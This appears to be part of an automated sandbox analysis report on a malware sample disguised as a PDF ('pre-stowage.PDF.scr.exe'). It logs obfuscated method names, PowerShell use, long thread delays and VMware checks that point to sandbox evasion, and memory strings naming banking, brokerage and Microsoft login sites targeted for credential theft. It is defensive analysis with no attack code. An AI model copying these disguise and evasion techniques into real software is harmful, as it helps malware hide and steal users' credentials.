Source: 0.2.pre-stowage.PDF.scr.exe.94b0000.5.raw.unpack, r5YwhfVYKOBjaNYsWF.cs | High entropy of concatenated method names: 'qv981D533I', 'JeD8hhyDE4', 'z1m8to2tNV', 'yJK8xQZoNl', 'O8j8DseaSN', 'ebh8ThcGCw', 'mYd8jVLGwI', 'UYh8rvD79K', 'DZq8eacTBB', 'VAR83DZ6d5'
Source: 0.2.pre-stowage.PDF.scr.exe.94b0000.5.raw.unpack, BW1XoG8aG2SQRRV2vI.cs | High entropy of concatenated method names: 'cAKuWXbHWE', 'nUgusq84th', 'ToString', 'faBuKkpvEW', 'B5Fu0yShrc', 'iJxufQFwED', 'F6WubTc3FB', 'aIQuNF2I8s', 'b89u8C3h2r', 'aLpupNVbwJ'
Source: 0.2.pre-stowage.PDF.scr.exe.94b0000.5.raw.unpack, KpCbpn3nRoLFMRTXIK.cs | High entropy of concatenated method names: 'ip6fx90Bqf', 'lkJfT3X34j', 'MrgfrY3Vyd', 'pqcferWTH1', 'BVtfCkpuPr', 'N68fqlCKjE', 'crefu3lnwi', 'MOCf6bKJ9Q', 'UGAfF4rZjC', 'EPkfy0DSVJ'
Source: 0.2.pre-stowage.PDF.scr.exe.94b0000.5.raw.unpack, As70r9koVQtCbi77sS.cs | High entropy of concatenated method names: 'imQFGVRHLd', 'S8UFmotGXR', 'JoQFdQgK4D', 'meLFQZuDf6', 'oATFwUG2Ks', 'XSuFnu9alB', 'UhjFV1Zqhn', 'OcwF4rSMEc', 'c9tFkng1wr', 'vkPFPMVtHG'

                Hooking and other Techniques for Hiding and Protection

                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: Possible double extension: pdf.scrStatic PE information: pre-stowage.PDF.scr.exe
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX

                Malware Analysis System Evasion

                Source: Yara match | File source: Process Memory Space: pre-stowage.PDF.scr.exe PID: 7128, type: MEMORYSTR
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exe | Memory allocated: 2D40000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exe | Memory allocated: 3020000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exe | Memory allocated: 2D40000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exe | Memory allocated: 97E0000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exe | Memory allocated: A7E0000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exe | Memory allocated: AA00000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exe | Memory allocated: BA00000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exe | Memory allocated: BE40000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exe | Memory allocated: CE40000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exe | Memory allocated: DE40000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exe | Memory allocated: EB0000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exe | Memory allocated: 2930000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exe | Memory allocated: 2720000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exe | Thread delayed: delay time: 922337203685477
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exe | Thread delayed: delay time: 240000
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exe | Thread delayed: delay time: 239875
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exe | Thread delayed: delay time: 239764
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exe | Thread delayed: delay time: 239654
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exe | Thread delayed: delay time: 239523
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exe | Thread delayed: delay time: 239406
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exe | Thread delayed: delay time: 239297
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exe | Thread delayed: delay time: 239187
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exe | Thread delayed: delay time: 239078
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exe | Thread delayed: delay time: 238967
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exe | Thread delayed: delay time: 238741
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exe | Thread delayed: delay time: 238597
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exe | Thread delayed: delay time: 238442
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exe | Thread delayed: delay time: 238283
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exe | Thread delayed: delay time: 238092
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exe | Thread delayed: delay time: 237970
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exe | Thread delayed: delay time: 237650
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exe | Thread delayed: delay time: 922337203685477
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exe | Thread delayed: delay time: 600000
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exe | Thread delayed: delay time: 599875
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exe | Thread delayed: delay time: 599763
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exe | Thread delayed: delay time: 599657
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exe | Thread delayed: delay time: 599532
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exe | Thread delayed: delay time: 599405
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exe | Thread delayed: delay time: 599297
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exe | Thread delayed: delay time: 599188
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exe | Thread delayed: delay time: 599078
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exe | Thread delayed: delay time: 598969
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exe | Thread delayed: delay time: 598844
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exe | Thread delayed: delay time: 598734
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exe | Thread delayed: delay time: 598625
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exe | Thread delayed: delay time: 598516
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exe | Thread delayed: delay time: 598407
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exe | Thread delayed: delay time: 598282
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exe | Thread delayed: delay time: 598157
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exe | Thread delayed: delay time: 598032
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exe | Thread delayed: delay time: 597922
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exe | Thread delayed: delay time: 597813
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exe | Thread delayed: delay time: 597688
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exe | Thread delayed: delay time: 597563
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exe | Thread delayed: delay time: 597438
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeThread delayed: delay time: 597313Jump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeThread delayed: delay time: 597204Jump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeThread delayed: delay time: 597079Jump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeThread delayed: delay time: 596954Jump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeThread delayed: delay time: 596829Jump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeThread delayed: delay time: 596704Jump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeThread delayed: delay time: 596579Jump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeThread delayed: delay time: 596454Jump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeThread delayed: delay time: 596329Jump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeThread delayed: delay time: 596204Jump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeThread delayed: delay time: 596079Jump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeThread delayed: delay time: 595954Jump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeThread delayed: delay time: 595829Jump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeThread delayed: delay time: 595704Jump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeThread delayed: delay time: 595579Jump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeThread delayed: delay time: 595454Jump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeThread delayed: delay time: 595329Jump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeThread delayed: delay time: 595204Jump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeThread delayed: delay time: 595079Jump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeThread delayed: delay time: 594954Jump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeThread delayed: delay time: 594829Jump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeThread delayed: delay time: 594704Jump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeThread delayed: delay time: 594579Jump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeThread delayed: delay time: 594454Jump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeThread delayed: delay time: 594329Jump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeThread delayed: delay time: 594204Jump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeThread delayed: delay time: 594079Jump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeWindow / User API: threadDelayed 1599Jump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeWindow / User API: threadDelayed 1291Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7585Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2121Jump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeWindow / User API: threadDelayed 1558Jump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeWindow / User API: threadDelayed 8267Jump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exe TID: 3804Thread sleep time: -11990383647911201s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exe TID: 3804Thread sleep time: -240000s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exe TID: 3804Thread sleep time: -239875s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exe TID: 3804Thread sleep time: -239764s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exe TID: 3804Thread sleep time: -239654s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exe TID: 3804Thread sleep time: -239523s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exe TID: 3804Thread sleep time: -239406s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exe TID: 3804Thread sleep time: -239297s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exe TID: 3804Thread sleep time: -239187s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exe TID: 3804Thread sleep time: -239078s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exe TID: 3804Thread sleep time: -238967s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exe TID: 3804Thread sleep time: -238741s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exe TID: 3804Thread sleep time: -238597s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exe TID: 3804Thread sleep time: -238442s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exe TID: 3804Thread sleep time: -238283s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exe TID: 3804Thread sleep time: -238092s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exe TID: 3804Thread sleep time: -237970s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exe TID: 3804Thread sleep time: -237650s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7252Thread sleep time: -4611686018427385s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exe TID: 7392Thread sleep count: 32 > 30Jump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exe TID: 7392Thread sleep time: -29514790517935264s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exe TID: 7392Thread sleep time: -600000s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exe TID: 7396Thread sleep count: 1558 > 30Jump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exe TID: 7392Thread sleep time: -599875s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exe TID: 7392Thread sleep time: -599763s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exe TID: 7392Thread sleep time: -599657s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exe TID: 7396Thread sleep count: 8267 > 30Jump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exe TID: 7392Thread sleep count: 33 > 30Jump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exe TID: 7392Thread sleep time: -599532s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exe TID: 7392Thread sleep time: -599405s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exe TID: 7392Thread sleep time: -599297s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exe TID: 7392Thread sleep time: -599188s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exe TID: 7392Thread sleep time: -599078s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exe TID: 7392Thread sleep time: -598969s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exe TID: 7392Thread sleep time: -598844s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exe TID: 7392Thread sleep time: -598734s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exe TID: 7392Thread sleep time: -598625s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exe TID: 7392Thread sleep time: -598516s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exe TID: 7392Thread sleep time: -598407s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exe TID: 7392Thread sleep time: -598282s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exe TID: 7392Thread sleep time: -598157s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exe TID: 7392Thread sleep time: -598032s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exe TID: 7392Thread sleep time: -597922s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exe TID: 7392Thread sleep time: -597813s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exe TID: 7392Thread sleep time: -597688s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exe TID: 7392Thread sleep time: -597563s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exe TID: 7392Thread sleep time: -597438s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exe TID: 7392Thread sleep time: -597313s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exe TID: 7392Thread sleep time: -597204s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exe TID: 7392Thread sleep time: -597079s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exe TID: 7392Thread sleep time: -596954s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exe TID: 7392Thread sleep time: -596829s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exe TID: 7392Thread sleep time: -596704s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exe TID: 7392Thread sleep time: -596579s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exe TID: 7392Thread sleep time: -596454s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exe TID: 7392Thread sleep time: -596329s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exe TID: 7392Thread sleep time: -596204s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exe TID: 7392Thread sleep time: -596079s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exe TID: 7392Thread sleep time: -595954s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exe TID: 7392Thread sleep time: -595829s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exe TID: 7392Thread sleep time: -595704s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exe TID: 7392Thread sleep time: -595579s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exe TID: 7392Thread sleep time: -595454s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exe TID: 7392Thread sleep time: -595329s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exe TID: 7392Thread sleep time: -595204s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exe TID: 7392Thread sleep time: -595079s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exe TID: 7392Thread sleep time: -594954s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exe TID: 7392Thread sleep time: -594829s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exe TID: 7392Thread sleep time: -594704s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exe TID: 7392Thread sleep time: -594579s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exe TID: 7392Thread sleep time: -594454s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exe TID: 7392Thread sleep time: -594329s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exe TID: 7392Thread sleep time: -594204s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exe TID: 7392Thread sleep time: -594079s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeThread delayed: delay time: 240000Jump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeThread delayed: delay time: 239875Jump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeThread delayed: delay time: 239764Jump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeThread delayed: delay time: 239654Jump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeThread delayed: delay time: 239523Jump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeThread delayed: delay time: 239406Jump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeThread delayed: delay time: 239297Jump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeThread delayed: delay time: 239187Jump to behavior
                Source: pre-stowage.PDF.scr.exe, 00000004.00000002.3767191739.0000000003A12000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696492231p
                Source: pre-stowage.PDF.scr.exe, 00000004.00000002.3767191739.0000000003A12000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - EU WestVMware20,11696492231n
                Source: pre-stowage.PDF.scr.exe, 00000004.00000002.3767191739.0000000003A12000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Canara Transaction PasswordVMware20,11696492231}
                Source: pre-stowage.PDF.scr.exe, 00000004.00000002.3767191739.0000000003A12000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: interactivebrokers.co.inVMware20,11696492231d
                Source: pre-stowage.PDF.scr.exe, 00000004.00000002.3767191739.0000000003A12000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: netportal.hdfcbank.comVMware20,11696492231
                Source: pre-stowage.PDF.scr.exe, 00000004.00000002.3767191739.0000000003A12000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: outlook.office.comVMware20,11696492231s
                Source: pre-stowage.PDF.scr.exe, 00000004.00000002.3767191739.0000000003A12000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696492231
                Source: pre-stowage.PDF.scr.exe, 00000004.00000002.3767191739.0000000003A12000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: AMC password management pageVMware20,11696492231
                Source: pre-stowage.PDF.scr.exe, 00000004.00000002.3767191739.0000000003A12000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: interactivebrokers.comVMware20,11696492231
                Source: pre-stowage.PDF.scr.exe, 00000004.00000002.3767191739.0000000003A12000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: microsoft.visualstudio.comVMware20,11696492231x
                Source: pre-stowage.PDF.scr.exe, 00000000.00000002.1312688344.0000000001247000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
                Source: pre-stowage.PDF.scr.exe, 00000004.00000002.3767191739.0000000003A12000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - COM.HKVMware20,11696492231
                Source: pre-stowage.PDF.scr.exe, 00000004.00000002.3767191739.0000000003A12000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Canara Change Transaction PasswordVMware20,11696492231^
                Source: pre-stowage.PDF.scr.exe, 00000004.00000002.3767191739.0000000003A12000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Test URL for global passwords blocklistVMware20,11696492231
                Source: pre-stowage.PDF.scr.exe, 00000004.00000002.3767191739.0000000003A12000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: outlook.office365.comVMware20,11696492231t
                Source: pre-stowage.PDF.scr.exe, 00000004.00000002.3767191739.0000000003A12000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696492231z
                Source: pre-stowage.PDF.scr.exe, 00000004.00000002.3767191739.0000000003A12000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: discord.comVMware20,11696492231f
                Source: pre-stowage.PDF.scr.exe, 00000004.00000002.3762655463.0000000000D17000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: pre-stowage.PDF.scr.exe, 00000004.00000002.3767191739.0000000003A12000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: global block list test formVMware20,11696492231
                Source: pre-stowage.PDF.scr.exe, 00000000.00000002.1312688344.0000000001247000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                Source: pre-stowage.PDF.scr.exe, 00000004.00000002.3767191739.0000000003A12000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: dev.azure.comVMware20,11696492231j
                Source: pre-stowage.PDF.scr.exe, 00000004.00000002.3767191739.0000000003A12000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: www.interactivebrokers.comVMware20,11696492231}
                Source: pre-stowage.PDF.scr.exe, 00000004.00000002.3767191739.0000000003A12000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: www.interactivebrokers.co.inVMware20,11696492231~
                Source: pre-stowage.PDF.scr.exe, 00000004.00000002.3767191739.0000000003A12000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: bankofamerica.comVMware20,11696492231x
                Source: pre-stowage.PDF.scr.exe, 00000004.00000002.3767191739.0000000003A12000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: trackpan.utiitsl.comVMware20,11696492231h
                Source: pre-stowage.PDF.scr.exe, 00000004.00000002.3767191739.0000000003A12000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: tasks.office.comVMware20,11696492231o
                Source: pre-stowage.PDF.scr.exe, 00000004.00000002.3767191739.0000000003A12000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: account.microsoft.com/profileVMware20,11696492231u
                Source: pre-stowage.PDF.scr.exe, 00000004.00000002.3767191739.0000000003A12000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Canara Change Transaction PasswordVMware20,11696492231
                Source: pre-stowage.PDF.scr.exe, 00000004.00000002.3767191739.0000000003A12000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696492231
                Source: pre-stowage.PDF.scr.exe, 00000004.00000002.3767191739.0000000003A12000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: ms.portal.azure.comVMware20,11696492231
                Source: pre-stowage.PDF.scr.exe, 00000004.00000002.3767191739.0000000003A12000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: turbotax.intuit.comVMware20,11696492231t
                Source: pre-stowage.PDF.scr.exe, 00000004.00000002.3767191739.0000000003A12000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: secure.bankofamerica.comVMware20,11696492231|UE
